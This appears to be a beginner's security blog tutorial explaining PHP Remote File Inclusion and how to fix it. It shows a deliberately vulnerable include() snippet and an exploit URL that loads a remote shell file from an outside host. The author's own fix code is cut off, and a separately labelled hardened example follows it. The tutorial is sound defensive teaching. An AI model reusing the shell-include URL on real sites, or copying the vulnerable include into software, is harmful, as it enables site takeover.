Hello !
I was wondering why most webmasters don't fix the vulnerabilities on their websites, and yet complain about hackers. Perhaps they don't know how, but why would they open a website if they don't know? Why won't they learn?
So I created this article to help you learn one way of fixing your website's vulnerabilities without needing anyone :D. Today's vulnerability is RFI.
A lot of you will ask: what is RFI?
Answer: RFI is an abbreviation of "Remote File Inclusion". It is a vulnerability, or security error, that allows others (hackers and crackers) to include a file (mostly a shell file) in your website in order to hack it.
Question: how will they include a file in my website without even uploading it?
Answer: too easy! Most RFI vulnerabilities look like this:
<?php
// coded by Tahar ZoFix for training purposes
if (empty($_GET['insert'])) {
    echo "Please Choose a File";
} else {
    include($_GET['insert']);
}
?>
And in the URL:
www.yourwebsite.com/xxxx.php?yyyy=File
where: xxxx = the name of the file (here: view.php)
yyyy = the parameter (here: insert)
OK, now to exploit this error, I will do this:
www.yourwebsite.com/xxxx.php?yyyy=http://target.com/shell.txt?
where http://target.com/shell.txt? is where the shell was uploaded in TXT format (really important), followed by the sign '?' (it means apply the PHP code inside the file, also really important).
So now, to fix it, you have to make sure that the file is on your server.
To do that:
<?php |
The code above makes sure that the file is on your server, so you avoid the RFI error.
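One way to implement the check described above, shown as an added example rather than the author's own code: it accepts only a bare page name and includes it only if it resolves to an existing file inside a local directory. The "pages" directory, the ".php" suffix and the resolve_local_page helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hardened replacement for the vulnerable view.php.
// Assumption: includable pages live in a "pages" directory next to
// this script and end in ".php" (hypothetical layout).
const PAGES_DIR = __DIR__ . '/pages';

/**
 * Map the user-supplied "insert" value to a file inside $baseDir.
 * Returns null when the value is not a local file in that directory.
 */
function resolve_local_page(string $name, string $baseDir): ?string
{
    // Bare page name only: no scheme (http://), slashes, dots or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() returns false for missing files and resolves symlinks.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit inside the pages directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$insert = $_GET['insert'] ?? '';
if (!is_string($insert) || $insert === '') {
    echo "Please Choose a File";
} else {
    $file = resolve_local_page($insert, PAGES_DIR);
    if ($file === null) {
        http_response_code(404);
        echo "File not found";
    } else {
        include $file;
    }
}
```

Keeping allow_url_include set to Off in php.ini (its default) also stops include from fetching URLs, but the local check is still needed so that only the intended files can be included.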
To save time and keep the article short and understandable, I skipped some steps that are not really important and that don't change the content of the article.
I hope you find it easy to understand. If you have any requests, do not hesitate to contact me :).
Lesson by: Tahar ZoFix
Sahara Security Blog.